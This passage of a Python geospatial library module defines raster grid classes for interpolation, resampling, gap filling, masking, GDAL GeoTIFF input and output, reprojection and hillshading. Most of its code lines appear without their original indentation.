cols = (0.49 + (X[...,0] - xmin) / dx).astype(np.int32)
bad = (rows<0) | (rows>=self.F.shape[0]) | (cols<0) | (cols>=self.F.shape[1])
elif interpolation == 'linear':
# for linear, we choose the floor() of both
row_alpha = ((X[...,1] - ymin) / dy)
col_alpha = ((X[...,0] - xmin) / dx)
rows = row_alpha.astype(np.int32)
cols = col_alpha.astype(np.int32)
row_alpha -= rows # [0,1]
col_alpha -= cols # [0,1]
# and we need one extra on the high end
bad = (rows<0) | (rows>=self.F.shape[0]-1) | (cols<0) | (cols>=self.F.shape[1]-1)
else:
raise Exception("bad interpolation type %s"%interpolation)
if rows.ndim > 0:
rows[bad] = 0
cols[bad] = 0
elif bad:
rows = cols = 0
if interpolation == 'nearest':
result = self.F[rows,cols]
else:
result = self.F[rows,cols] *(1.0-row_alpha)*(1.0-col_alpha) \
+ self.F[rows+1,cols] *row_alpha *(1.0-col_alpha) \
+ self.F[rows,cols+1] *(1.0-row_alpha)*col_alpha \
+ self.F[rows+1,cols+1]*row_alpha *col_alpha
# It may have been an int field, and now we need to go to float and set some nans:
if result.dtype in (int,np.int8,np.int16,np.int32,np.int64):
print("Converting from %s to float"%result.dtype)
result = result.astype(np.float64)
result[ result==self.int_nan ] = np.nan
if result.ndim>0:
result[bad] = np.nan
elif bad:
result = np.nan
# let linear interpolation fall back to nearest at the borders:
if interpolation=='linear' and fallback and np.any(bad):
result[bad] = self.interpolate(X[bad],interpolation='nearest',fallback=False)
return result
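    # Illustrative sketch (hypothetical grid): bilinear interpolation on a
    # 2x2 SimpleGrid spanning x,y in [0,1].
    #   sg = SimpleGrid(extents=[0.,1.,0.,1.],F=np.array([[0.,1.],[2.,3.]]))
    #   sg.interpolate(np.array([[0.5,0.5]]),interpolation='linear') # => [1.5]
    #   sg.interpolate(np.array([[1.,1.]]))  # on the far edge, linear falls
    #                                        # back to 'nearest' => [3.]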
def value(self,X):
return self.interpolate(X)
def value_on_edge(self,e,samples=None,**kw):
""" Return the value averaged along an edge - the generic implementation
just takes 5 samples evenly spaced along the line, using value()
"""
if samples is None:
res = min(self.dx,self.dy)
l = norm(e[1]-e[0])
samples = int(np.ceil(l/res))
return Field.value_on_edge(self,e,samples=samples,**kw)
def upsample(self,factor=2):
x = np.linspace(self.extents[0],self.extents[1],1+factor*(self.F.shape[1]-1))
y = np.linspace(self.extents[2],self.extents[3],1+factor*(self.F.shape[0]-1))
new_F = np.zeros( (len(y),len(x)) , np.float64 )
for row in range(len(y)):
for col in range(len(x)):
                new_F[row,col] = 0.25 * (self.F[row//factor,col//factor] +
                                         self.F[(row+1)//factor,col//factor] +
                                         self.F[row//factor,(col+1)//factor] +
                                         self.F[(row+1)//factor,(col+1)//factor])
return SimpleGrid(self.extents,new_F)
def downsample(self,factor,method='decimate'):
"""
method: 'decimate' just takes every nth sample
'ma_mean' takes the mean of n*n blocks, and is nan
and mask aware.
"""
factor = int(factor)
# use a really naive downsampling for now:
if method=='decimate':
new_F = np.array(self.F[::factor,::factor])
elif method=='ma_mean':
# if not isinstance(self.F,np.ma.core.MaskedArray):
F=self.F
nr,nc=F.shape
nr+=(-nr)%factor # pad to even multiple
nc+=(-nc)%factor # pad...
F2=np.ma.zeros((nr,nc))
F2[:]=np.nan
F2[:F.shape[0],:F.shape[1]]=F
F2=np.ma.masked_invalid(F2)
F2=F2.reshape([nr//factor,factor,nc//factor,factor])
F2=F2.transpose([0,2,1,3]).reshape([nr//factor,nc//factor,factor*factor])
new_F=F2.mean(axis=2)
else:
assert False
x,y = self.xy()
new_x = x[::factor]
new_y = y[::factor]
        new_extents = [new_x[0],new_x[-1],new_y[0],new_y[-1]]
return SimpleGrid(new_extents,new_F)
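    # Illustrative sketch (hypothetical grid): 'ma_mean' averages factor x
    # factor blocks, ignoring nan/masked pixels, while 'decimate' just keeps
    # every factor-th sample.
    #   sg = SimpleGrid(extents=[0.,3.,0.,3.],
    #                   F=np.arange(16,dtype=np.float64).reshape(4,4))
    #   sg.downsample(2,method='ma_mean').F
    #   # => [[ 2.5, 4.5],
    #   #     [10.5,12.5]]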
## Methods to fill in missing data
def fill_by_griddata(self):
""" Basically griddata - limits the input points to the borders
of areas missing data.
Fills in everything within the convex hull of the valid input pixels.
"""
# Find pixels missing one or more neighbors:
valid = np.isfinite(self.F)
all_valid_nbrs = np.ones(valid.shape,'bool')
all_valid_nbrs[:-1,:] &= valid[1:,:] # to the west
all_valid_nbrs[1:,:] &= valid[:-1,:] # to east
all_valid_nbrs[:,:-1] &= valid[:,1:] # to north
all_valid_nbrs[:,1:] &= valid[:,:-1] # to south
missing_a_nbr = valid & (~ all_valid_nbrs )
i,j = nonzero(missing_a_nbr)
x = np.arange(self.F.shape[0])
y = np.arange(self.F.shape[1])
values = self.F[i,j]
# Try interpolating the whole field - works, but slow...
# some issue here with transpose.
# x ~ 1470 - but it's really rows
# y ~ 1519 - but it's really columns.
# so griddata takes (xi,yi,zi, x,y)
# but returns as rows,columns
# fill_data ~ [1519,1470]
# old way: fill_data = griddata(i,j,values,x,y)
fill_data = griddata(j,i,values,y,x)
self.F[~valid] = fill_data[~valid] # fill_data is wrong orientation
# Is there a clever way to use convolution here -
def fill_by_convolution(self,iterations=7,smoothing=0,kernel_size=3):
""" Better for filling in small seams - repeatedly
applies a 3x3 average filter. On each iteration it can grow
the existing data out by 2 pixels.
Note that by default there is not
a separate smoothing process - each iteration will smooth
the pixels from previous iterations, but a pixel that is set
on the last iteration won't get any smoothing.
Set smoothing >0 to have extra iterations where the regions are not
grown, but the averaging process is reapplied.
If iterations is 'adaptive', then iterate until there are no nans.
"""
kern = np.ones( (kernel_size,kernel_size) )
valid = np.isfinite(self.F)
bin_valid = valid.copy()
# newF = self.F.copy()
newF = self.F # just do it in place
newF[~valid] = 0.0
if iterations=='adaptive':
iterations=1
adaptive=True
else:
adaptive=False
i = 0
while i < iterations+smoothing:
#for i in range(iterations + smoothing):
weights = signal.convolve2d(bin_valid,kern,mode='same',boundary='symm')
values = signal.convolve2d(newF,kern,mode='same',boundary='symm')
# update data_or_zero and bin_valid
# so anywhere that we now have a nonzero weight, we should get a usable value.
# for smoothing-only iterations, the valid mask isn't expanded
if i < iterations:
bin_valid |= (weights>0)
to_update = (bin_valid & (~valid)).astype(bool)
newF[to_update] = values[to_update] / weights[to_update]
i+=1
if adaptive and (np.sum(~bin_valid)>0):
iterations += 1 # keep trying
else:
adaptive = False # we're done
# and turn the missing values back to nan's
newF[~bin_valid] = np.nan
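    # Illustrative sketch (hypothetical grid): patch a small hole by repeated
    # 3x3 averaging. Each iteration grows the valid region outward.
    #   sg = SimpleGrid(extents=[0.,9.,0.,9.],F=np.ones((10,10)))
    #   sg.F[4:6,4:6] = np.nan              # punch a hole
    #   sg.fill_by_convolution(iterations='adaptive')
    #   np.any(np.isnan(sg.F))              # => False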
def smooth_by_convolution(self,kernel_size=3,iterations=1):
"""
Repeatedly apply a 3x3 average filter (or other size: kernel_size).
Similar to the smoothing step of fill_by_convolution, except that
the effect is applied everywhere, not just in the newly-filled
areas.
"""
kern = np.ones( (kernel_size,kernel_size) )
valid = np.isfinite(self.F)
# avoid nan contamination - set these to zero
self.F[~valid] = 0.0
for i in range(iterations):
weights = signal.convolve2d(valid, kern,mode='same',boundary='symm')
values = signal.convolve2d(self.F,kern,mode='same',boundary='symm')
# update data_or_zero and bin_valid
# so anywhere that we now have a nonzero weight, we should get a usable value.
self.F[valid] = values[valid] / weights[valid]
# and turn the missing values back to nan's
self.F[~valid] = np.nan
def polygon_mask(self,poly,crop=True,return_values=False):
""" similar to mask_outside, but:
much faster due to outsourcing tests to GDAL
returns a boolean array same size as self.F, with True for
pixels inside the polygon.
        crop: if True, optimize by cropping the source raster first. Results
        should agree with the uncropped path up to roundoff.
        return_values: if True, rather than returning a bitmask the same size
        as self.F, return just the values of F that fall inside poly. This
        can save space and time when just extracting a small set of values
        from a large raster
"""
# could be made even simpler, by creating OGR features directly from the
# polygon, rather than create a full-on datasource.
# likewise, could jump straight to creating a target raster, rather
# than creating a SimpleGrid just to get the metadata right.
if crop:
xyxy=poly.bounds
xxyy=[xyxy[0], xyxy[2], xyxy[1], xyxy[3]]
indexes=self.rect_to_indexes(xxyy)
cropped=self.crop(indexes=indexes)
ret=cropped.polygon_mask(poly,crop=False,return_values=return_values)
if return_values:
return ret # done!
else:
mask_crop=ret
                full_mask=np.zeros(self.F.shape,bool)
min_row,max_row,min_col,max_col = indexes
full_mask[min_row:max_row+1,min_col:max_col+1]=mask_crop
return full_mask
from . import wkb2shp
raster_ds=self.write_gdal('Memory')
poly_ds=wkb2shp.wkb2shp("Memory",[poly])
target_field=SimpleGrid(F=np.zeros(self.F.shape,np.int32),
extents=self.extents)
target_ds = target_field.write_gdal('Memory')
# write 1000 into the array where the polygon falls.
gdal.RasterizeLayer(target_ds,[1],poly_ds.GetLayer(0),None,None,[1000],[])
new_raster=GdalGrid(target_ds)
ret=new_raster.F>0
if return_values:
return self.F[ret]
else:
return ret
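# Usage sketch (hedged): extract the pixels of a field that fall inside a
# shapely polygon; 'dem' is a hypothetical SimpleGrid/GdalGrid and the box
# coordinates are made up.
#
#   from shapely import geometry
#   aoi = geometry.box(500000, 4150000, 502000, 4152000)
#   mask = dem.polygon_mask(aoi)                      # boolean, same shape as dem.F
#   vals = dem.polygon_mask(aoi, return_values=True)  # just the in-polygon values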
def mask_outside(self,poly,value=np.nan,invert=False,straddle=None):
""" Set the values that fall outside the given polygon to the
given value. Existing nan values are untouched.
Compared to polygon_mask, this is slow but allows more options on
exactly how to test each pixel.
straddle: if None, then only test against the center point
if True: a pixel intersecting the poly, even if the center is not
inside, is accepted.
[future: False: reject straddlers]
"""
if prep:
poly = prep(poly)
X,Y = self.xy()
rect=np.array([[-self.dx/2.0,-self.dy/2.0],
[self.dx/2.0,-self.dy/2.0],
[self.dx/2.0,self.dy/2.0],
[-self.dx/2.0,self.dy/2.0]])
for col in range(len(X)):
# print("%d/%d"%(col,len(X)))
for row in range(len(Y)):
if np.isfinite(self.F[row,col]):
if straddle is None:
p = geometry.Point(X[col],Y[row])
if (not poly.contains(p)) ^ invert:# i hope that's the right logic
self.F[row,col] = value
elif straddle:
p = geometry.Polygon( np.array([X[col],Y[row]])[None,:] + rect )
if (not poly.intersects(p)) ^ invert:
self.F[row,col] = value
def write(self,fname):
fp = open(fname,'wb')
pickle.dump( (self.extents,self.F), fp, -1)
fp.close()
def to_rgba(self,cmap='jet',vmin=None,vmax=None):
"""
map scalar field to pseudocolor rgba.
"""
if cm is None:
raise Exception("No matplotlib - can't map to RGB")
if vmin is None:
vmin = self.F.min()
if vmax is None:
vmax = self.F.max()
cmap=cm.get_cmap(cmap) # e.g. 'jet' => cm.jet
invalid=np.isnan(self.F)
fscaled = (self.F-vmin)/(vmax-vmin)
fscaled[invalid]=0
frgba = (cmap(fscaled)*255).astype(np.uint8)
frgba[invalid,:3]=255
frgba[invalid,3]=0
return SimpleGrid(extents=self.extents,F=frgba,projection=self.projection())
def write_gdal_rgb(self,output_file,**kw):
if len(self.F.shape)==2:
# As a convenience convert to RGBA then write
return self.to_rgba(**kw).write_gdal_rgb(output_file)
# Create gtif
driver = gdal.GetDriverByName("GTiff")
dst_ds = driver.Create(output_file, self.F.shape[1], self.F.shape[0], 4, gdal.GDT_Byte,
["COMPRESS=LZW"])
frgba=self.F
# assumes that nodata areas are already transparent, or somehow dealt with.
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
# Gdal wants pixel-edge extents, but what we store is pixel center extents...
dx,dy = self.delta()
# Some GDAL utilities function better if the output is in image coordinates, so flip back
# if needed
if dy > 0:
# print "Flipping to be in image coordinates"
dy = -dy
frgba = frgba[::-1,:,:]
dst_ds.SetGeoTransform( [ self.extents[0]-0.5*dx, dx,
0, self.extents[3]-0.5*dy, 0, dy ] )
# set the reference info
if self.projection() is not None:
srs = osr.SpatialReference()
srs.SetWellKnownGeogCS(self.projection())
dst_ds.SetProjection( srs.ExportToWkt() )
# write the band
for band in range(4):
b1 = dst_ds.GetRasterBand(band+1)
b1.WriteArray(frgba[:,:,band])
dst_ds.FlushCache()
gdalwarp = "gdalwarp" # path to command
def warp_to_match(self,target):
"""
Given a separate field, target, warp this one to match it pixel for pixel.
Both self and target should have a meaningful projection().
"""
# adjust for GDAL wanting to pixel edges, not
# pixel centers
halfdx = 0.5*target.dx
halfdy = 0.5*target.dy
te = "-te %f %f %f %f "%(target.extents[0]-halfdx,target.extents[2]-halfdy,
target.extents[1]+halfdx,target.extents[3]+halfdy)
ts = "-ts %d %d"%(target.F.T.shape)
return self.warp(target.projection(),
extra=te + ts)
def warp(self,t_srs,s_srs=None,fn=None,extra=""):
""" interface to gdalwarp
t_srs: string giving the target projection
s_srs: override current projection of the dataset, defaults to self._projection
fn: if set, the result will retained, written to the given file. Otherwise
the transformation will use temporary files. opts: other
extra: other options to pass to gdalwarp
"""
tmp_src = tempfile.NamedTemporaryFile(suffix='.tif',delete=False)
tmp_src_fn = tmp_src.name ; tmp_src.close()
if fn is not None:
tmp_dest_fn = fn
else:
tmp_dest = tempfile.NamedTemporaryFile(suffix='.tif',delete=False)
tmp_dest_fn = tmp_dest.name
tmp_dest.close()
s_srs = s_srs or self.projection()
self.write_gdal(tmp_src_fn)
output=subprocess.check_output("%s -s_srs '%s' -t_srs '%s' -dstnodata 'nan' %s %s %s"%(self.gdalwarp,s_srs,t_srs,
extra,
tmp_src_fn,tmp_dest_fn),
shell=True)
self.last_warp_output=output # dirty, but maybe helpful
result = GdalGrid(tmp_dest_fn)
os.unlink(tmp_src_fn)
if fn is None:
os.unlink(tmp_dest_fn)
return result
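# Usage sketch (hedged): reproject via the external gdalwarp command (must be
# on PATH); the EPSG code and the fields 'dem' and 'other' are hypothetical.
#
#   utm = dem.warp("EPSG:26910")             # new GdalGrid in the target projection
#   aligned = dem.warp_to_match(other)       # resample onto another field's pixels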
def write_gdal(self,output_file,nodata=None,overwrite=False,options=None):
""" Write a Geotiff of the field.
if nodata is specified, nan's are replaced by this value, and try to tell
gdal about it.
if output_file is "Memory", will create an in-memory GDAL dataset and return it.
"""
in_memory= (output_file=='Memory')
if not in_memory:
# Create gtif
driver = gdal.GetDriverByName("GTiff")
if options is None:
options=["COMPRESS=LZW"]
else:
driver = gdal.GetDriverByName("MEM")
if options is None:
options=[]
if os.path.exists(output_file):
if overwrite:
os.unlink(output_file)
else:
raise Exception("File %s already exists"%output_file)
gtype = numpy_type_to_gdal[self.F.dtype.type]
dst_ds = driver.Create(output_file, self.F.shape[1], self.F.shape[0], 1, gtype,
options)
raster = self.F
if nodata is not None:
raster = raster.copy()
raster[ np.isnan(raster) ] = nodata
# top left x, w-e pixel resolution, rotation, top left y, rotation, n-s pixel resolution
# Gdal wants pixel-edge extents, but what we store is pixel center extents...
dx,dy = self.delta()
# Some GDAL utilities function better if the output is in image coordinates, so flip back
# if needed
if dy > 0:
# print "Flipping to be in image coordinates"
dy = -dy
raster = raster[::-1,:]
dst_ds.SetGeoTransform( [ self.extents[0]-0.5*dx, dx,
0, self.extents[3]-0.5*dy, 0, dy ] )
# set the reference info
if self.projection() not in ('',None):
srs = osr.SpatialReference()
if srs.SetFromUserInput(self.projection()) != 0:
log.warning("Failed to set projection (%s) on GDAL output"%(self.projection()))
dst_ds.SetProjection( srs.ExportToWkt() )
# write the band
b1 = dst_ds.GetRasterBand(1)
if nodata is not None:
b1.SetNoDataValue(nodata)
else:
# does this work?
b1.SetNoDataValue(np.nan)
b1.WriteArray(raster)
if not in_memory:
dst_ds.FlushCache()
else:
return dst_ds
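# Usage sketch (hedged): write a field to GeoTIFF, or build an in-memory GDAL
# dataset for further GDAL processing; 'dem' and the filename are hypothetical.
#
#   dem.write_gdal('out.tif', nodata=-9999, overwrite=True)
#   mem_ds = dem.write_gdal('Memory')        # gdal.Dataset, not written to disk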
def point_to_index(self,X):
X=np.asarray(X)
x = (X[...,0]-self.extents[0])/self.dx
y = (X[...,1]-self.extents[2])/self.dy
return np.array([y,x]).T
def extract_tile(self,xxyy=None,res=None,match=None,interpolation='linear',missing=np.nan):
""" Create the requested tile
xxyy: a 4-element sequence
match: another field, assumed to be in the same projection, to match
pixel for pixel.
interpolation: 'linear','quadratic','cubic' will pass the corresponding order
to RectBivariateSpline.
'bilinear' will instead use simple bilinear interpolation, which has the
added benefit of preserving nans.
missing: the value to be assigned to parts of the tile which are not covered
by the source data.
"""
if match is not None:
xxyy = match.extents
resx,resy = match.delta()
x,y = match.xy()
else:
if res is None:
resx = resy = self.dx
else:
resx = resy = res
xxyy=as_xxyy(xxyy)
x = np.arange(xxyy[0],xxyy[1]+resx,resx)
y = np.arange(xxyy[2],xxyy[3]+resy,resy)
myx,myy = self.xy()
if interpolation == 'bilinear':
F=self.F
def interper(y,x):
# this is taken from a stack overflow answer
# "simple-efficient-bilinear-interpolation-of-images-in-numpy-and-python"
# but altered so that x and y are 1-D arrays, and the result is a
# 2-D array (x and y as in inputs to meshgrid)
# scale those to float-valued indices into F
x = (np.asarray(x)-self.extents[0])/self.dx
y = (np.asarray(y)-self.extents[2])/self.dy
x0 = np.floor(x).astype(int)
x1 = x0 + 1
y0 = np.floor(y).astype(int)
y1 = y0 + 1
x0 = np.clip(x0, 0, F.shape[1]-1)
x1 = np.clip(x1, 0, F.shape[1]-1)
y0 = np.clip(y0, 0, F.shape[0]-1)
y1 = np.clip(y1, 0, F.shape[0]-1)
Ia = F[ y0,:][:, x0 ]
Ib = F[ y1,:][:, x0 ]
Ic = F[ y0,:][:, x1 ]
Id = F[ y1,:][:, x1 ]
wa = (x1-x)[None,:] * (y1-y)[:,None]
wb = (x1-x)[None,:] * (y-y0)[:,None]
wc = (x-x0)[None,:] * (y1-y)[:,None]
wd = (x-x0)[None,:] * (y-y0)[:,None]
result = wa*Ia + wb*Ib + wc*Ic + wd*Id
result[ y<0,: ] = missing
result[ y>F.shape[0],: ] = missing
result[ :, x<0 ] = missing
result[ :, x>F.shape[1]] = missing
return result
else:
k = ['constant','linear','quadratic','cubic'].index(interpolation)
if np.any(np.isnan(self.F)):
F = self.F.copy()
F[ np.isnan(F) ] = 0.0
else:
F = self.F
# Unfortunately this doesn't respect nan values in F
interper = RectBivariateSpline(x=myy,y=myx,z=F,kx=k,ky=k)
# limit to where we actually have data:
# possible 0.5dx issues here
xbeg,xend = np.searchsorted(x,self.extents[:2])
ybeg,yend = np.searchsorted(y,self.extents[2:])
Ftmp = np.ones( (len(y),len(x)),dtype=self.F.dtype)
Ftmp[...] = missing
# This might have some one-off issues
Ftmp[ybeg:yend,xbeg:xend] = interper(y[ybeg:yend],x[xbeg:xend])
return SimpleGrid(extents=xxyy,
F=Ftmp)
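# Usage sketch (hedged): resample a subset of the field onto a new tile; 'dem',
# 'other', the bounds and the resolution are hypothetical.
#
#   tile = dem.extract_tile(xxyy=[500000, 502000, 4150000, 4152000],
#                           res=10.0, interpolation='bilinear')
#   tile2 = dem.extract_tile(match=other)    # pixel-for-pixel match to another field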
def gradient(self):
""" compute 2-D gradient of the field, returning a pair of fields of the
same size (one-sided differences are used at the boundaries, central elsewhere).
returns fields: dFdx,dFdy
"""
# make it the same size, but use one-sided stencils at the boundaries
dFdx = np.zeros(self.F.shape,np.float64)
dFdy = np.zeros(self.F.shape,np.float64)
# central difference in interior:
dFdx[:,1:-1] = (self.F[:,2:] - self.F[:,:-2]) /(2*self.dx)
dFdy[1:-1,:] = (self.F[2:,:] - self.F[:-2,:]) /(2*self.dy)
# one-sided at boundaries:
dFdx[:,0] = (self.F[:,1] - self.F[:,0])/self.dx
dFdx[:,-1] = (self.F[:,-1] - self.F[:,-2])/self.dx
dFdy[0,:] = (self.F[1,:] - self.F[0,:])/self.dy
dFdy[-1,:] = (self.F[-1,:] - self.F[-2,:])/self.dy
dx_field = SimpleGrid(extents = self.extents,F = dFdx)
dy_field = SimpleGrid(extents = self.extents,F = dFdy)
return dx_field,dy_field
def hillshade_scalar(self,azimuth_deg=225,zenith_deg=45,z_factor=10):
dx,dy=self.gradient()
azimuth_rad=azimuth_deg*np.pi/180
zenith_rad=zenith_deg*np.pi/180
slope_rad = np.arctan( z_factor * np.sqrt( dx.F**2 + dy.F**2) )
aspect_rad = np.arctan2(dy.F,-dx.F)
hillshade=np.cos(zenith_rad)*np.cos(slope_rad) + \
np.sin(zenith_rad)*np.sin(slope_rad)*np.cos(azimuth_rad - aspect_rad)
return SimpleGrid(F=hillshade,extents=self.extents)
def hillshade_shader(self,**kwargs):
hs=self.hillshade_scalar(**kwargs)
Frgba=np.zeros( hs.F.shape + (4,), 'f4')
Frgba[...,3] = 1-hs.F.clip(0,1)
hs.F=Frgba
return hs
@with_plt
def plot_hillshade(self,ax=None,plot_args={},**kwargs):
shader=self.hillshade_shader(**kwargs)
ax=ax or plt.gca()
return shader.plot(ax=ax,**plot_args)
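# Usage sketch (hedged): overlay a hillshade on a pseudocolor plot; assumes
# matplotlib is available and 'dem' is a hypothetical SimpleGrid.
#
#   import matplotlib.pyplot as plt
#   fig, ax = plt.subplots()
#   dem.plot(ax=ax, cmap='gray')
#   dem.plot_hillshade(ax=ax, z_factor=5.0)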
def overlay_rgba(self,other):
"""
Composite another field over self.
Requires that self and other are rgba fields.
in keeping with matplotlib rgba arrays, values can
either be [0-1] floating point or [0-255] integer.
other will be cast as needed to match self.
other must have matching resolution and extents (this function does not
currently resample to match self)
"""
assert np.allclose( self.extents, other.extents)
assert np.array_equal( self.F.shape, other.F.shape)
assert self.F.shape[2]==4
if np.issubdtype(self.F.dtype, np.floating):
Fother=other.F
if not np.issubdtype(Fother.dtype, np.floating):
Fother=(Fother/255).clip(0,1.0)
alpha=other.F[:,:,3]
my_alpha=self.F[:,:,3]
if my_alpha.min()==1.0:
inv_alpha=1.0
else:
new_alpha=alpha + my_alpha*(1-alpha)
inv_alpha=1./new_alpha
inv_alpha[ new_alpha==0 ]=0
else:
# integer
Fother=other.F
if np.issubdtype(Fother.dtype, np.floating):
alpha=other.F[:,:,3]
Fother=(Fother.clip(0,1)*255).astype(np.uint8)
if self.F[:,:,3].min()==255:
# Special case when background is opaque
inv_alpha=1.0
else:
my_alpha=(self.F[:,:,3]/255.).clip(0,1)
new_alpha=alpha + my_alpha*(1-alpha)
inv_alpha=1./new_alpha
inv_alpha[ new_alpha==0 ]=0
self.F[:,:,3]=255*new_alpha
for chan in range(3):
self.F[:,:,chan] = (self.F[:,:,chan]*(1-alpha) + other.F[:,:,chan]*alpha) * inv_alpha
@staticmethod
def read(fname):
fp = open(fname,'rb')
extents, F = pickle.load( fp )
fp.close()
return SimpleGrid(extents=extents,F=F)
class GtxGrid(SimpleGrid):
def __init__(self,filename,is_vertcon=False,missing=9999,projection='WGS84'):
""" loads vdatum style binary gtx grids
is_vertcon: when true, adjusts values from mm to m
"""
self.filename = filename
fp=open(self.filename,'rb')
ll_lat,ll_lon,delta_lat,delta_lon = np.frombuffer(fp.read(4*8),'>f8')
ll_lon = (ll_lon + 180)%360. - 180
nrows,ncols = np.frombuffer(fp.read(2*4),'>i4')
heights = np.frombuffer(fp.read(nrows*ncols*8),'>f4').reshape( (nrows,ncols) )
heights = heights.byteswap().newbyteorder().astype(np.float64).copy() # does this fix byte order?
heights[ heights == missing ] = np.nan
if is_vertcon:
heights *= 0.001 # vertcon heights in mm
# pretty sure that the corner values from the GTX file are
# node-centered, so no need here to pass half-pixels around.
SimpleGrid.__init__(self,
extents = [ll_lon,ll_lon+(ncols-1)*delta_lon,ll_lat,ll_lat+(nrows-1)*delta_lat],
F = heights,
projection=projection)
class GdalGrid(SimpleGrid):
"""
A specialization of SimpleGrid that can load single channel and RGB
files via the GDAL library.
Use this for loading GeoTIFFs, some GRIB files, and other formats supported
by GDAL.
"""
@staticmethod
def metadata(filename):
""" Return the extents and resolution without loading the whole file
"""
gds = gdal.Open(filename)
(x0, dx, r1, y0, r2, dy ) = gds.GetGeoTransform()
nx = gds.RasterXSize
ny = gds.RasterYSize
# As usual, this may be off by a half pixel...
x1 = x0 + nx*dx
y1 = y0 + ny*dy
xmin = min(x0,x1)
xmax = max(x0,x1)
ymin = min(y0,y1)
ymax = max(y0,y1)
return [xmin,xmax,ymin,ymax],[dx,dy]
def __init__(self,filename,bounds=None,geo_bounds=None):
""" Load a raster dataset into memory.
bounds: [x-index start, x-index end, y-index start, y-index end]
will load a subset of the raster.
filename: path to a GDAL-recognized file, or an already opened GDAL dataset.
geo_bounds: xxyy bounds in geographic coordinates
"""
if isinstance(filename,gdal.Dataset):
self.gds=filename
else:
assert os.path.exists(filename),"GdalGrid: '%s' does not exist"%filename
self.gds = gdal.Open(filename)
(x0, dx, r1, y0, r2, dy ) = self.gds.GetGeoTransform()
if geo_bounds is not None:
# convert geo_bounds to index bounds:
ix_start = int( float(geo_bounds[0]-x0)/dx )
ix_end = int( float(geo_bounds[1]-x0)/dx)+ 1
# careful about sign of dy
if dy>0:
iy_start = int( float(geo_bounds[2]-y0)/dy )
iy_end = int( float(geo_bounds[3]-y0)/dy ) + 1
else:
iy_start = int( float(geo_bounds[3]-y0)/dy )
iy_end = int( float(geo_bounds[2]-y0)/dy ) + 1
# clip those to valid ranges
ix_max=self.gds.RasterXSize
ix_start=max(0,min(ix_start,ix_max-1))
ix_end=max(0,min(ix_end,ix_max-1))
iy_max=self.gds.RasterYSize
iy_start=max(0,min(iy_start,iy_max-1))
iy_end=max(0,min(iy_end,iy_max-1))
bounds = [ix_start,ix_end,
iy_start,iy_end]
# print "geo bounds gave bounds",bounds
self.geo_bounds = geo_bounds
self.subset_bounds = bounds
if bounds:
A = self.gds.ReadAsArray(xoff = bounds[0],yoff=bounds[2],
xsize = bounds[1] - bounds[0],
ysize = bounds[3] - bounds[2])
# and doctor up the metadata to reflect this:
x0 += bounds[0]*dx
y0 += bounds[2]*dy
else:
A = self.gds.ReadAsArray()
# A is rows/cols !
# And starts off with multiple channels, if they exist, as the
# first index.
if A.ndim == 3:
print("Putting multiple channels as last index")
A = A.transpose(1,2,0)
# often gdal data is in image coordinates, which is just annoying.
# Funny indexing because sometimes there are multiple channels, and those
# appear as the first index:
Nrows = A.shape[0]
Ncols = A.shape[1]
if dy < 0:
# make y0 refer to the bottom left corner
# and dy refer to positive northing
y0 = y0 + Nrows*dy
dy = -dy
# this used to have the extra indices at the start,
# but I think that's wrong, as we put extra channels at the end
A = A[::-1,:,...]
# and there might be a nodata value, which we want to map to NaN
b = self.gds.GetRasterBand(1)
nodata = b.GetNoDataValue()
if nodata is not None:
if A.dtype in (np.int16,np.int32):
A[ A==nodata ] = self.int_nan
elif A.dtype in (np.uint16,np.uint32):
A[ A==nodata ] = 0 # not great...
else:
A[ A==nodata ] = np.nan
SimpleGrid.__init__(self,
extents = [x0+0.5*dx,
x0+0.5*dx + dx*(Ncols-1),
y0+0.5*dy,
y0+0.5*dy + dy*(Nrows-1)],
F=A,
projection=self.gds.GetProjection() )
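# Usage sketch (hedged): load a GeoTIFF, or just a window of it, via GDAL;
# 'dem.tif' and the bounds are hypothetical.
#
#   extents, (dx, dy) = GdalGrid.metadata('dem.tif')   # peek without loading pixels
#   full = GdalGrid('dem.tif')
#   window = GdalGrid('dem.tif', geo_bounds=[500000, 502000, 4150000, 4152000])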
def rasterize_grid_cells(g,values,dx=None,dy=None,stretch=True,
cell_mask=slice(None),match=None):
"""
g: UnstructuredGrid
values: scalar values for each cell of the grid. With stretch=True, any numeric values are scaled into the uint16 range; otherwise they are cast directly to uint16.
dx,dy: resolution of the resulting raster
stretch: use the full range of a uint16
cell_mask: bitmask of cell indices to use. values should still be full
size.
match: an existing SimpleGrid field to copy extents/shape from
returns: SimpleGrid field in memory
"""
from . import wkb2shp
dtype=np.uint16
values=values[cell_mask]
if stretch:
vmin=values.min()
vmax=values.max()
fac=1./(vmax-vmin) * (np.iinfo(dtype).max-1)
values=1+( (values-vmin)*fac ).astype(dtype)
else:
values=values.astype(np.uint16)
polys=[g.cell_polygon(c) for c in np.arange(g.Ncells())[cell_mask]]
poly_ds=wkb2shp.wkb2shp("Memory",polys,
fields=dict(VAL=values.astype(np.uint32)))
if match:
extents=match.extents
Ny,Nx=match.F.shape
else:
extents=g.bounds()
Nx=int( 1+ (extents[1]-extents[0])/dx )
Ny=int( 1+ (extents[3]-extents[2])/dy )
F=np.zeros( (Ny,Nx), np.float64)
target_field=SimpleGrid(F=F,extents=extents)
target_ds = target_field.write_gdal('Memory')
# write 1000 into the array where the polygon falls.
gdal.RasterizeLayer(target_ds,[1],poly_ds.GetLayer(0),options=["ATTRIBUTE=VAL"])
#None,None,[1000],[])
new_raster=GdalGrid(target_ds)
if stretch:
F=new_raster.F
Fnew=np.zeros(F.shape,np.float64)
Fnew = (F-1)/fac+vmin
Fnew[F==0]=np.nan
new_raster.F=Fnew
return new_raster
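# Usage sketch (hedged): rasterize a per-cell scalar from an unstructured grid
# onto a 5 m raster; 'g' is a hypothetical UnstructuredGrid and the values are
# made up for illustration.
#
#   import numpy as np
#   cell_vals = np.linspace(-10.0, -2.0, g.Ncells())
#   rast = rasterize_grid_cells(g, cell_vals, dx=5.0, dy=5.0)
#   rast.write_gdal('cells.tif')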
if ogr:
from stompy.spatial import interp_coverage
class BlenderField(Field):
""" Delegate to sub-fields, based on polygons in a shapefile, and blending
where polygons overlap.
If delegates is specified:
The shapefile is expected to have a field 'name', which is then used to
index the dict to get the corresponding field.
Alternatively, if a factory is given, it should be callable and will take a single argument -
a dict with the attributes for each source. The factory should then return the corresponding
Field.
"""
def __init__(self,shp_fn=None,delegates=None,factory=None,subset=None,
shp_data=None):
# awkward handling of cobbled together multicall - can pass either shapefile
# path or pre-parsed shapefile data.
if shp_fn is not None: # read from shapefile
self.shp_fn = shp_fn
self.shp_data=None
